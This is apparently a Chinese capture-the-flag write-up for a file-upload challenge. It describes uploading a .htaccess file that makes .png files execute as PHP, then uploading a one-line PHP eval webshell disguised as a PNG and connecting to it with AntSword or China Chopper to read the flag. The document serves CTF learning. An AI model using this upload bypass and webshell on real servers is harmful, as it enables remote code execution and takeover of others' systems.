开始直接传木马,但不管是“图片马”还是其他格式的马,都传不上,一直返回
开始还以为是防火过滤太强了,一直试着绕过。看了下别人的wp原来考察了个htaccess(分布式配置文件)
看了百科和一些大佬的博客介绍的很抽象不好理解,推荐这个网站通俗易懂些 7个常用的.htaccess代码
下面是解题步骤:
一、创建个".htaccess"文件 写入
AddType application/x-httpd-php .png
意思是:上传的".png"会被当做 php代码执行。
先创个文档写入,再另存为选择所有文件形式改扩展名。
就是成功创立了
二、上传抓包修改
上传刚刚的文件,修改:content-type的数据,将**.htaccess**以png文件数据上传
三、注入一句话图片马
图片马制作类似上述**.htaccess制作**
文档写入一句话
<?php @eval($_POST['dj']);?>
然后以.png文件另存为
将图片马上传
成功上传
四、用蚁剑或菜刀链接
flag在根目录